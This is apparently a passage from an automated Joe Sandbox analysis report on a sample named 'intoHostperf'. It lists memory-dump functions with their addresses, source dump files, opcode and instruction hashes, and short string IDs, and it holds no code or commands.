                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f18269190a2ad39345e0525279b1430a882b1bb3a91307ababa9ae50c8ff01a
                                                              • Instruction ID: d132166a2312a25b9407788a0e41635f51b5bf24eba30af67c9633dfd82e0995
                                                              • Opcode Fuzzy Hash: 9f18269190a2ad39345e0525279b1430a882b1bb3a91307ababa9ae50c8ff01a
                                                              • Instruction Fuzzy Hash: BCC08C02D0F52B0AF400B16E34022ACA1005FC46D8FD50232C60C420C19F0D28DE014E
                                                              Function 00007FF848D912B0 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                              • Instruction ID: 95ce83a6834e6011011f0dd4d2b76eccbbd617e30b09e93c6a2b9198b6183dc6
                                                              • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                              • Instruction Fuzzy Hash: 24C04C34555C099FC948FB29C88591477A0FB19215FD60090E40DC7171D759DCD5C745
                                                              Function 00007FF8494E7D6B Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                              • Instruction ID: cde3502d298ff1c877b03cb140258c31cb75861dcba92958e5ce760db7f2a621
                                                              • Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                              • Instruction Fuzzy Hash: 78D09224E2C6C38DF9396F49C06063965914FA53A1E20417DD05F418C1CD1C7481E601
                                                              Function 00007FF8494E00FB Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 355f1cba0f93c65c19b9f9f008d132ec152b968214f9386fdb3060b430c07dc2
                                                              • Instruction ID: 3c148ffc7a25da8af7c3eb0c408eacf38072d7871fda31de204b12711b09e318
                                                              • Opcode Fuzzy Hash: 355f1cba0f93c65c19b9f9f008d132ec152b968214f9386fdb3060b430c07dc2
                                                              • Instruction Fuzzy Hash: ABD09210A0C6DB8EF979BE09C02123A96908F06780E60053AC0EF55CC2C92E7981AA12
                                                              Function 00007FF8491506CB Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: addde97e8417e0b387dadf5c435b037b7cd000eba1eb4b698e29039176604eb9
                                                              • Instruction ID: 5399b2a1efb7fa753bcb84510a6acd4bceb1759ed3c4fef6f8252f3a1b233ffc
                                                              • Opcode Fuzzy Hash: addde97e8417e0b387dadf5c435b037b7cd000eba1eb4b698e29039176604eb9
                                                              • Instruction Fuzzy Hash: EED0C910E0F6878DF1787E91802073EA5905F903A1FA2003EC15F429C1CD1C7C417A02
                                                              Function 00007FF848D94034 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aefa209ad7119b382788077eb0473090eaba27def198a74fb9de87efbcbc04fa
                                                              • Instruction ID: 1890ae841b3d320c672b6f23af590b6480d0e278d8c8961d9205b2b180c605f0
                                                              • Opcode Fuzzy Hash: aefa209ad7119b382788077eb0473090eaba27def198a74fb9de87efbcbc04fa
                                                              • Instruction Fuzzy Hash: E4C04C51E5E85B56E5557215852127D0443EB94B84F944074E40E977CACE6C590612CB
                                                              Function 00007FF8491592EB Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c941de1e7d464f7059424c36c930c3fe85aa22a569e42444c0add91d8dbd449c
                                                              • Instruction ID: 39a9c099030cbe069fab21b4a51cc4acf32aa45fbec85a66c6c9c238c061865b
                                                              • Opcode Fuzzy Hash: c941de1e7d464f7059424c36c930c3fe85aa22a569e42444c0add91d8dbd449c
                                                              • Instruction Fuzzy Hash: 5BC012A0F0C2838FE7722D6008810BC92609B062A17C6053AC8068A1C3E91CA80A5B62
                                                              Function 00007FF848D906C8 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd044758332ebbd5ef0a191d6c42c27f909fecff129b423ec5547d29263f8ae6
                                                              • Instruction ID: 4c0396d2771f7dbe7661ee5f90230b8198361c4991dacd91c1d4eb35e5ed9b34
                                                              • Opcode Fuzzy Hash: cd044758332ebbd5ef0a191d6c42c27f909fecff129b423ec5547d29263f8ae6
                                                              • Instruction Fuzzy Hash: E5B01200C5F40F04E40431BA184216970405F84188FC51270D80C410819B4D14DD024B

                                                              Non-executed Functions

                                                              Function 00007FF8494E45D0 Relevance: 19.1, Strings: 15, Instructions: 346COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: aWI$ bWI$0aWI$0bWI$@^WI$@bWI$HlWI$PbWI$`bWI$pbWI$`WI$bWI$dWI$eWI$nWI
                                                              • API String ID: 0-940567387
                                                              • Opcode ID: 47aad9a1a2f0c9c4e7ede2295163eef9941cd66f8fcc6dec36f524830f498178
                                                              • Instruction ID: 73ab9ae81fa25425aa915ae08d75122a77b95808cf647cf759a6ef5207c6ccd2
                                                              • Opcode Fuzzy Hash: 47aad9a1a2f0c9c4e7ede2295163eef9941cd66f8fcc6dec36f524830f498178
                                                              • Instruction Fuzzy Hash: 8BC1C062D0FBC28FE6662A78A8190757FB1FF12790B2901FBC184871DBD4689E45C3C6
                                                              Function 00007FF848D909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: da09f9a6bcee1a962996bcfbf05a354ed46fd846d00f896e1da8add6e8c22a7e
                                                              • Instruction ID: a83817ce90397f35e0a0d5a37d11d90214766cf6a80994f5948f94c7476466d0
                                                              • Opcode Fuzzy Hash: da09f9a6bcee1a962996bcfbf05a354ed46fd846d00f896e1da8add6e8c22a7e
                                                              • Instruction Fuzzy Hash: ED417F17A0F562A9E11133FE74293FD5B86EF812F9F084677E14C8A0874F08658692FD